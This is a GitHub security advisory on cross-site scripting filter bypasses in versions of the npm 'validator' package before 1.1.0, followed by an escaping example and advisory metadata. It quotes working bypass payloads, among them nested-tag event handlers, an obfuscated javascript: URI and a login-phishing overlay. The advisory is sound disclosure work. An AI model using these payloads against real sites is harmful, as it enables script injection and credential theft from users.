ghsa-q4qq-fm7q-cwp5
Vulnerability from github
Versions of `validator` prior to 1.1.0 are affected by several cross-site scripting vulnerabilities due to bypasses discovered in the blacklist-based filter.
Proof of Concept
Various inputs that could bypass the filter were discovered:
Improper parsing of nested tags:
```
<s <onmouseover="alert(1)"> <;s onmouseover="alert(1)">This is a test</s>
```
Incomplete filtering of javascript: URIs:
```
<a href="javascriptJ a V a S c R iPt::alert(1)" "<s>">test</a>
```
UI Redressing:
```
<div style="z-index: 9999999; background-color: green; width: 100%; height: 100%">
<h1>You have won</h1>Please click the link and enter your login details:
<a href="http://example.com/">http://good.com</a>
</div>
```
Bypass via Nested Forbidden Strings:
```
<scrRedirecRedirect 302t 302ipt type="text/javascript">prompt(1);</scrRedirecRedirect 302t 302ipt>
```
Additional bypasses were discovered by Krzysztof Kotowicz in 2012 while auditing CodeIgniter's XSS filtering function, on which this code was based.
Recommendation
If you are a developer currently using the `xss` filter function from the `validator` package, you should consider replacing it with the `escape` filter function from the same package. That function replaces all instances of angle brackets (<, >), ampersands, and quotation marks with their HTML entities, so no HTML tags will be processed.
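As an added example (not code from the advisory or from the validator project), the following implements the escape-on-output behaviour the recommendation describes and runs it over the bypass payloads quoted above, checking that none of them survives as markup and that the transformation is lossless. The helper names and the single-quote rule are assumptions of this example.

```javascript
// Added example, not code from the advisory or the validator project.
// Escape order matters: '&' goes first, otherwise the '&' that '&lt;' etc.
// introduce would itself be turned into '&amp;lt;'.
const ESCAPES = [
  ['&', '&amp;'],
  ['<', '&lt;'],
  ['>', '&gt;'],
  ['"', '&quot;'],
  ["'", '&#x27;'], // assumption: also escape single quotes (advisory names only ")
];

// Escape on output: every character that could open a tag, close one or
// break out of an attribute becomes an entity, so no HTML is ever parsed.
function escapeHtml(input) {
  let out = String(input);
  for (const [ch, entity] of ESCAPES) out = out.split(ch).join(entity);
  return out;
}

// Inverse, applied in reverse order with '&amp;' last; used only to show
// the transformation is lossless (unlike a filter that strips input).
function unescapeHtml(input) {
  let out = String(input);
  for (const [ch, entity] of [...ESCAPES].reverse()) out = out.split(entity).join(ch);
  return out;
}

// True if the HTML parser could still see a tag or attribute delimiter.
function containsMarkupDelimiters(s) {
  return /[<>"']/.test(s);
}

// The bypass inputs quoted in the advisory above.
const ADVISORY_PAYLOADS = [
  '<s <onmouseover="alert(1)"> <;s onmouseover="alert(1)">This is a test</s>',
  '<a href="javascriptJ a V a S c R iPt::alert(1)" "<s>">test</a>',
  '<scrRedirecRedirect 302t 302ipt type="text/javascript">prompt(1);</scrRedirecRedirect 302t 302ipt>',
];

// Every payload must come out free of delimiters and decode back unchanged.
function allPayloadsNeutralised(payloads = ADVISORY_PAYLOADS) {
  return payloads.every((p) => {
    const escaped = escapeHtml(p);
    return !containsMarkupDelimiters(escaped) && unescapeHtml(escaped) === p;
  });
}

console.log(allPayloadsNeutralised() ? 'all payloads rendered inert' : 'FILTER FAILED');
```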
Advisory metadata (from the GitHub Advisory Database record):
- ID: GHSA-q4qq-fm7q-cwp5 (alias CVE-2013-7454)
- Summary: Multiple XSS Filter Bypasses in validator
- Affected: npm package `validator`, all versions before 1.1.0 (fixed in 1.1.0)
- CWE: CWE-79
- Severity: MODERATE; CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
- Published: 2017-10-24T18:33:36Z; modified: 2021-09-16T19:30:36Z; GitHub reviewed: 2020-06-16T21:50:57Z
- References:
  - https://nvd.nist.gov/vuln/detail/CVE-2013-7454
  - https://github.com/advisories/GHSA-q4qq-fm7q-cwp5
  - https://nealpoole.com/blog/2013/07/xss-filter-bypass-in-validator-nodejs-module
  - https://www.npmjs.com/advisories/41
  - http://blog.kotowicz.net/2012/07/codeigniter-210-xssclean-cross-site.html
  - http://www.openwall.com/lists/oss-security/2016/04/20/11